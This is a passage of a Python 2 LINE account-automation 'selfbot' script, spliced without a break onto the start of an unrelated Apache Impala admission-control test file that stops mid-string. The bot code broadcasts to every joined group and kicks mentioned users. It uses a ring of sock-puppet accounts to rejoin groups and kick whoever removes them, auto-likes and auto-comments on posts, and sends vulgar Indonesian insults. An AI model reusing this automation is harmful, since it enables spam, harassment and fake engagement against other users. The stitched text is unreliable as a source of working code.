cl.sendText(msg.to, "Done") print " Spammed !" elif msg.text in ["anjir","Anjir"]: cl.sendText(msg.to,"Astaga kak jangan kasar dong") elif msg.text in ["ANJAY","Anjay","anjay"]: cl.sendText(msg.to,"Santai dong ngentot !") elif msg.text in ["Ilham","Ham","ilham","ham","Star"]: cl.sendText(msg.to,"Lagi coli dia bang") elif msg.text in ["List group","Glist"]: if msg.from_ in admin: gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "[⭐] %s \n" % (cl.getGroup(i).name + " | Members : " + str(len (cl.getGroup(i).members))) cl.sendText(msg.to, "☆「Group List」☆\n"+ h +"Total Group : " +str(len(gid))) elif "Mid @" in msg.text: _name = msg.text.replace("Mid @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(msg.to, g.mid) else: pass elif msg.text in ["Creator","Pembuat bot"]: if msg.from_ in admin: msg.contentType = 13 msg.contentMetadata = {'mid': 'uc8e2c2b906e2322592c6d8f91a0957f7'} cl.sendMessage(msg) cl.sendText(msg.to,"Itu Creator Saya ") #-------------Fungsi Spam Start---------------------# elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]: if msg.from_ in admin: cl.sendText(msg.to,"ANJAY") #-------------Fungsi Spam Finish---------------------# elif "Group bc " in msg.text: bctxt = msg.text.replace("Group bc ", "") n = cl.getGroupIdsJoined() for manusia in n: cl.sendText(manusia, (bctxt)) elif ("Bye " in msg.text): if msg.from_ in admin: key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"][0]["M"] targets = [] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: cl.kickoutFromGroup(msg.to,[target]) except: pass elif "/InviteMeTo: " in msg.text: if msg.from_ in admin: gid = msg.text.replace("/InviteMeTo: ","") if gid == "": cl.sendText(msg.to,"Invalid group id") else: try: cl.findAndAddContactsByMid(msg.from_) cl.inviteIntoGroup(gid,[msg.from_]) except: cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu") elif msg.text in ["Gr on","gr on"]: if msg.from_ in admin: if wait["Protectgr"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protect Group On") else: cl.sendText(msg.to,"done") else: wait["Protectgr"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protect Group On") else: cl.sendText(msg.to,"done") #----------------------------------------------- 
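# Note on the "Mentionall" / "Tag all" handlers above (descriptive comment, not part
# of the original logic): the MENTION contentMetadata pairs each placeholder token
# appended to the outgoing text with an entry {"S": start, "E": end, "M": mid}, where
# S/E are character offsets into the message. With the 6-character placeholder
# "@nrik\n" the first two members get spans (0,5) and (6,11); the "Tag all" variant
# simply uses the 7-character placeholder "@nrik \n", giving (0,6) and (7,13). The
# start offset therefore always equals the length of the text built so far, and the
# end offset excludes the trailing newline of the placeholder.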
#----------------------------------------------- if op.type == 19: try: if op.param3 in mid: if op.param2 in kimid: G = ki.getGroup(op.param1) G.preventJoinByTicket = False ki.updateGroup(G) Ticket = ki.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True cl.updateGroup(G) else: G = ki.getGroup(op.param1) ki.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki.updateGroup(G) Ticket = ki.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True cl.updateGroup(G) ki.updateGroup(G) wait["blacklist"][op.param2] = True elif op.param3 in kimid: if op.param2 in ki2mid: G = ki2.getGroup(op.param1) G.preventJoinByTicket = False ki2.updateGroup(G) Ticket = ki2.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki2.updateGroup(G) else: G = ki2.getGroup(op.param1) ki2.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki2.updateGroup(G) Ticket = ki2.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki.updateGroup(G) elif op.param3 in ki3mid: if op.param2 in ki2mid: G = ki2.getGroup(op.param1) G.preventJoinByTicket = False ki2.updateGroup(G) Ticket = ki2.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki2.updateGroup(G) else: G = cl.getGroup(op.param1) ki2.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki2.updateGroup(G) Ticket = ki2.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) 
G.preventJoinByTicket = True ki2.updateGroup(G) elif op.param3 in ki2mid: if op.param2 in ki3mid: G = ki3.getGroup(op.param1) G.preventJoinByTicket = False ki3.updateGroup(G) Ticket = ki3.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki3.updateGroup(G) else: G = cl.getGroup(op.param1) ki3.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki3.updateGroup(G) Ticket = ki3.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki3.updateGroup(G) elif op.param3 in ki4mid: if op.param2 in ki5mid: G = ki5.getGroup(op.param1) G.preventJoinByTicket = False ki5.updateGroup(G) Ticket = ki5.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True cl.updateGroup(G) else: G = ki5.getGroup(op.param1) ki5.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki5.updateGroup(G) Ticket = ki5.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki5.updateGroup(G) elif op.param3 in ki5mid: if op.param2 in ki4mid: G = ki4.getGroup(op.param1) G.preventJoinByTicket = False ki4.updateGroup(G) Ticket = ki4.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki4.updateGroup(G) else: G = ki4.getGroup(op.param1) ki4.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki4.updateGroup(G) Ticket = ki4.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki4.updateGroup(G) elif op.param3 in ki6mid: if 
op.param2 in ki5mid: G = ki5.getGroup(op.param1) G.preventJoinByTicket = False ki5.updateGroup(G) Ticket = ki5.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki5.updateGroup(G) else: G = ki5.getGroup(op.param1) ki5.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki5.updateGroup(G) Ticket = ki5.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki5.updateGroup(G) elif op.param3 in ki7mid: if op.param2 in ki6mid: G = ki6.getGroup(op.param1) G.preventJoinByTicket = False ki6.updateGroup(G) Ticket = ki6.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) ki7.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki6.updateGroup(G) else: G = ki6.getGroup(op.param1) ki6.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki6.updateGroup(G) Ticket = ki6.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) ki7.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki6.updateGroup(G) elif op.param3 in ki8mid: if op.param2 in ki7mid: G = ki7.getGroup(op.param1) G.preventJoinByTicket = False ki7.updateGroup(G) Ticket = ki7.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) ki7.acceptGroupInvitationByTicket(op.param1,Ticket) ki8.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki7.updateGroup(G) else: G = ki7.getGroup(op.param1) ki7.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki7.updateGroup(G) Ticket = ki7.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) 
ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) ki7.acceptGroupInvitationByTicket(op.param1,Ticket) ki8.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki7.updateGroup(G) except: pass if op.type == 17: if op.param2 not in Bots: if op.param2 in Bots: pass if wait["protect"] == True: if wait["blacklist"][op.param2] == True: try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) G = random.choice(KAC).getGroup(op.param1) G.preventJoinByTicket = True ki4.updateGroup(G) # random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) except: # pass try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) G = random.choice(KAC).getGroup(op.param1) G.preventJoinByTicket = True random.choice(KAC).updateGroup(G) # random.choice(KAK).kickoutFromGroup(op.param1,[op.param2]) except: pass elif op.param2 not in admin + Bots: random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!") else: pass if op.type == 19: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["protect"] == True: wait ["blacklist"][op.param2] = True random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) else: cl.sendText(op.param1,"") else: cl.sendText(op.param1,"") if op.type == 13: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) else: cl.sendText(op.param1,"") else: cl.sendText(op.param1,"") if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) else: cl.sendText(op.param1,"") else: cl.sendText(op.param1,"") if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["cancelprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) else: cl.sendText(op.param1,"") else: cl.sendText(op.param1,"") if op.type == 11: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["linkprotect"] == True: wait ["blacklist"][op.param2] = True G = ki.getGroup(op.param1) G.preventJoinByTicket = True ki.updateGroup(G) random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) else: cl.sendText(op.param1,"") else: cl.sendText(op.param1,"") if op.type == 5: if wait["autoAdd"] == True: if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) #------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------ if op.type == 55: print "[NOTIFIED_READ_MESSAGE]" try: if op.param1 in wait2['readPoint']: Nama = cl.getContact(op.param2).displayName if Nama in wait2['readMember'][op.param1]: pass else: wait2['readMember'][op.param1] += "\n-> " + Nama wait2['ROM'][op.param1][op.param2] = "-> " + Nama wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S') else: cl.sendText except: pass if op.type == 59: print op except Exception as error: print error def a2(): now2 = datetime.now() nowT = datetime.strftime(now2,"%M") if nowT[14:] in ["10","20","30","40","50","00"]: return False else: return True def autolike(): for zx in range(0,20): hasil = cl.activity(limit=20) if hasil['result']['posts'][zx]['postInfo']['liked'] == False: try: cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002) 
                cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like by Naufal Blaze")
                kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
                kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Support By CrimeBot")
                print "Like"
            except:
                pass
        else:
            print "Already liked"
            time.sleep(500)

# Background thread that periodically auto-likes timeline posts.
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()

def nameUpdate():
    while True:
        try:
            #while a2():
            #pass
            if wait["clock"] == True:
                now2 = datetime.now()
                nowT = datetime.strftime(now2,"(%H:%M)")
                profile = cl.getProfile()
                profile.displayName = wait["cName"] + nowT
                cl.updateProfile(profile)
            time.sleep(600)
        except:
            pass

# Background thread that appends the current time to the display name.
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()

# Main long-poll loop: fetch pending operations and dispatch each one to bot().
while True:
    try:
        Ops = cl.fetchOps(cl.Poll.rev, 5)
    except EOFError:
        raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
    for Op in Ops:
        if (Op.type != OpType.END_OF_OPERATION):
            cl.Poll.rev = max(cl.Poll.rev, Op.revision)
            bot(Op)
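# Illustrative sketch (not part of the original script): the main loop above is a
# long-poll dispatcher -- fetchOps() blocks until new operations arrive, and the
# stored revision is advanced to the highest revision seen so that each operation is
# handled once per poll. The helper below restates that bookkeeping in a
# self-contained form; the names poll_once, fetch, handle and end_marker are
# assumptions for illustration only and do not exist in the original code.
def poll_once(fetch, handle, revision, end_marker):
    """Fetch one batch of operations, dispatch them, and return the new revision."""
    ops = fetch(revision)           # e.g. would wrap cl.fetchOps(revision, 5)
    for op in ops:
        if op.type == end_marker:   # skip END_OF_OPERATION sentinels
            continue
        revision = max(revision, op.revision)
        handle(op)                  # e.g. the bot(Op) dispatcher above
    return revision
# Keeping the revision update before handle() means a crash while handling an
# operation skips it on the next poll rather than reprocessing it, which is the
# behaviour the loop above exhibits.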
test_admission_controller.py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # Tests admission control import itertools import logging import math import os import pytest import re import shutil import sys import threading from copy import copy from time import sleep, time from beeswaxd.BeeswaxService import QueryState from tests.beeswax.impala_beeswax import ImpalaBeeswaxException from tests.common.custom_cluster_test_suite import CustomClusterTestSuite from tests.common.environ import build_flavor_timeout, ImpalaTestClusterProperties from tests.common.impala_test_suite import ImpalaTestSuite from tests.common.resource_pool_config import ResourcePoolConfig from tests.common.skip import ( SkipIfS3, SkipIfABFS, SkipIfADLS, SkipIfEC, SkipIfNotHdfsMinicluster, SkipIfOS) from tests.common.test_dimensions import ( create_single_exec_option_dimension, create_uncompressed_text_dimension) from tests.common.test_vector import ImpalaTestDimension from tests.hs2.hs2_test_suite import HS2TestSuite, needs_session from tests.util.web_pages_util import ( get_num_completed_backends, get_mem_admitted_backends_debug_page) from tests.verifiers.mem_usage_verifier import MemUsageVerifier from ImpalaService import ImpalaHiveServer2Service from TCLIService import TCLIService LOG = logging.getLogger('admission_test') # The query used for testing. It is important that this query returns many rows # while keeping fragments active on all backends. This allows a thread to keep # the query active and consuming resources by fetching one row at a time. The # where clause is for debugging purposes; each thread will insert its id so # that running queries can be correlated with the thread that submitted them. QUERY = " union all ".join(["select * from functional.alltypesagg where id != {0}"] * 30) # The statestore heartbeat and topic update frequency (ms). Set low for testing. STATESTORE_RPC_FREQUENCY_MS = 100 # Time to sleep (in milliseconds) between issuing queries. When the delay is at least # the statestore heartbeat frequency, all state should be visible by every impalad by # the time the next query is submitted. Otherwise the different impalads will see stale # state for some admission decisions. SUBMISSION_DELAY_MS = \ [0, STATESTORE_RPC_FREQUENCY_MS / 2, STATESTORE_RPC_FREQUENCY_MS * 3 / 2] # The number of queries to submit. The test does not support fewer queries than # MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES to keep some validation logic # simple. NUM_QUERIES = [15, 30, 50] # Whether we will submit queries to all available impalads (in a round-robin fashion) ROUND_ROBIN_SUBMISSION = [True, False] # The query pool to use. The impalads should be configured to recognize this # pool with the parameters below. POOL_NAME = "default-pool" # Stress test timeout (seconds). 
The timeout needs to be significantly higher for # slow builds like code coverage and ASAN (IMPALA-3790, IMPALA-6241). STRESS_TIMEOUT = build_flavor_timeout(90, slow_build_timeout=600) # The number of queries that can execute concurrently in the pool POOL_NAME. MAX_NUM_CONCURRENT_QUERIES = 5 # The number of queries that can be queued in the pool POOL_NAME MAX_NUM_QUEUED_QUERIES = 10 # Mem limit (bytes) used in the mem limit test MEM_TEST_LIMIT = 12 * 1024 * 1024 * 1024 _STATESTORED_ARGS = ("-statestore_heartbeat_frequency_ms={freq_ms} " "-statestore_priority_update_frequency_ms={freq_ms}").format( freq_ms=STATESTORE_RPC_FREQUENCY_MS) # Name of the subscriber metric tracking the admission control update interval. REQUEST_QUEUE_UPDATE_INTERVAL =\ 'statestore-subscriber.topic-impala-request-queue.update-interval' # Key in the query profile for the query options. PROFILE_QUERY_OPTIONS_KEY = "Query Options (set by configuration): " # The different ways that a query thread can end its query. QUERY_END_BEHAVIORS = ['EOS', 'CLIENT_CANCEL', 'QUERY_TIMEOUT', 'CLIENT_CLOSE'] # The timeout used for the QUERY_TIMEOUT end behaviour QUERY_END_TIMEOUT_S = 1 # Value used for --admission_control_stale_topic_threshold_ms in tests. STALE_TOPIC_THRESHOLD_MS = 500 # Regex that matches the first part of the profile info string added when a query is # queued. INITIAL_QUEUE_REASON_REGEX = \ "Initial admission queue reason: waited [0-9]* ms, reason: .*" # The path to resources directory which contains the admission control config files. RESOURCES_DIR = os.path.join(os.environ['IMPALA_HOME'], "fe", "src", "test", "resources") def impalad_admission_ctrl_flags(max_requests, max_queued, pool_max_mem, proc_mem_limit=None, queue_wait_timeout_ms=None): extra_flags = "" if proc_mem_limit is not None: extra_flags += " -mem_limit={0}".format(proc_mem_limit) if queue_wait_timeout_ms is not None: extra_flags += " -queue_wait_timeout_ms={0}".format(queue_wait_timeout_ms) return ("-vmodule admission-controller=3 -default_pool_max_requests {0} " "-default_pool_max_queued {1} -default_pool_mem_limit {2} {3}".format( max_requests, max_queued, pool_max_mem, extra_flags)) def impalad_admission_ctrl_config_args(fs_allocation_file, llama_site_file, additional_args="", make_copy=False): fs_allocation_path = os.path.join(RESOURCES_DIR, fs_allocation_file) llama_site_path = os.path.join(RESOURCES_DIR, llama_site_file) if make_copy: copy_fs_allocation_path = os.path.join(RESOURCES_DIR, "copy-" + fs_allocation_file) copy_llama_site_path = os.path.join(RESOURCES_DIR, "copy-" + llama_site_file) shutil.copy2(fs_allocation_path, copy_fs_allocation_path) shutil.copy2(llama_site_path, copy_llama_site_path) fs_allocation_path = copy_fs_allocation_path llama_site_path = copy_llama_site_path return ("-vmodule admission-controller=3 -fair_scheduler_allocation_path %s " "-llama_site_path %s %s" % (fs_allocation_path, llama_site_path, additional_args)) def log_metrics(log_prefix, metrics): LOG.info("%sadmitted=%s, queued=%s, dequeued=%s, rejected=%s, " "released=%s, timed-out=%s", log_prefix, metrics['admitted'], metrics['queued'], metrics['dequeued'], metrics['rejected'], metrics['released'], metrics['timed-out']) def compute_metric_deltas(m2, m1): """Returns a dictionary of the differences of metrics in m2 and m1 (m2 - m1)""" return dict((n, m2.get(n, 0) - m1.get(n, 0)) for n in m2.keys()) def metric_key(pool_name, metric_name): """Helper method to construct the admission controller metric keys""" return "admission-controller.%s.%s" % (metric_name, 
pool_name) class TestAdmissionControllerBase(CustomClusterTestSuite): @classmethod def get_workload(self): return 'functional-query' @classmethod def add_test_dimensions(cls): super(TestAdmissionControllerBase, cls).add_test_dimensions() cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension()) # There's no reason to test this on other file formats/compression codecs right now cls.ImpalaTestMatrix.add_dimension( create_uncompressed_text_dimension(cls.get_workload())) class TestAdmissionController(TestAdmissionControllerBase, HS2TestSuite): def __check_pool_rejected(self, client, pool, expected_error_re): try: client.set_configuration({'request_pool': pool}) client.execute("select 1") assert False, "Query should return error" except ImpalaBeeswaxException as e: assert re.search(expected_error_re, str(e)) def __check_query_options(self, profile, expected_query_options): """Validate that the expected per-pool query options were set on the specified profile. expected_query_options is a list of "KEY=VALUE" strings, e.g. ["MEM_LIMIT=1", ...]""" confs = [] for line in profile.split("\n"): if PROFILE_QUERY_OPTIONS_KEY in line: rhs = re.split(": ", line)[1] confs = re.split(",", rhs) break expected_set = set([x.lower() for x in expected_query_options]) confs_set = set([x.lower() for x in confs]) assert expected_set.issubset(confs_set) def __check_hs2_query_opts(self, pool_name, mem_limit=None, expected_options=None): """ Submits a query via HS2 (optionally with a mem_limit in the confOverlay) into pool_name and checks that the expected_query_options are set in the profile.""" execute_statement_req = TCLIService.TExecuteStatementReq() execute_statement_req.sessionHandle = self.session_handle execute_statement_req.confOverlay = {'request_pool': pool_name} if mem_limit is not None: execute_statement_req.confOverlay['mem_limit'] = mem_limit execute_statement_req.statement = "select 1" execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req) HS2TestSuite.check_response(execute_statement_resp) fetch_results_req = TCLIService.TFetchResultsReq() fetch_results_req.operationHandle = execute_statement_resp.operationHandle fetch_results_req.maxRows = 1 fetch_results_resp = self.hs2_client.FetchResults(fetch_results_req) HS2TestSuite.check_response(fetch_results_resp) close_operation_req = TCLIService.TCloseOperationReq() close_operation_req.operationHandle = execute_statement_resp.operationHandle HS2TestSuite.check_response(self.hs2_client.CloseOperation(close_operation_req)) get_profile_req = ImpalaHiveServer2Service.TGetRuntimeProfileReq() get_profile_req.operationHandle = execute_statement_resp.operationHandle get_profile_req.sessionHandle = self.session_handle get_profile_resp = self.hs2_client.GetRuntimeProfile(get_profile_req) HS2TestSuite.check_response(get_profile_resp) self.__check_query_options(get_profile_resp.profile, expected_options) def _execute_and_collect_profiles(self, queries, timeout_s, config_options={}, allow_query_failure=False): """Submit the query statements in 'queries' in parallel to the first impalad in the cluster. After submission, the results are fetched from the queries in sequence and their profiles are collected. Wait for up to timeout_s for each query to finish. If 'allow_query_failure' is True, succeeds if the query completes successfully or ends up in the EXCEPTION state. Otherwise expects the queries to complete successfully. 
Returns the profile strings.""" client = self.cluster.impalads[0].service.create_beeswax_client() expected_states = [client.QUERY_STATES['FINISHED']] if allow_query_failure: expected_states.append(client.QUERY_STATES['EXCEPTION']) try: handles = [] profiles = [] client.set_configuration(config_options) for query in queries: handles.append(client.execute_async(query)) for query, handle in zip(queries, handles): state = self.wait_for_any_state(handle, expected_states, timeout_s) if state == client.QUERY_STATES['FINISHED']: self.client.fetch(query, handle) profiles.append(self.client.get_runtime_profile(handle)) return profiles finally: client.close() @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="fair-scheduler-test2.xml", llama_site_file="llama-site-test2.xml"), default_query_options=[('mem_limit', 200000000)], statestored_args=_STATESTORED_ARGS) @needs_session(conf_overlay={'batch_size': '100'}) def test_set_request_pool(self): """Tests setting the REQUEST_POOL with the pool placement policy configured to require a specific pool, and validate that the per-pool configurations were applied.""" impalad = self.cluster.impalads[0] client = impalad.service.create_beeswax_client() # Expected default mem limit for queueA, used in several tests below queueA_mem_limit = "MEM_LIMIT=%s" % (128 * 1024 * 1024) try: for pool in ['', 'not_a_pool_name']: expected_error =\ "No mapping found for request from user '\S+' with requested pool '%s'"\ % (pool) self.__check_pool_rejected(client, pool, expected_error) # Check rejected if user does not have access. expected_error = "Request from user '\S+' with 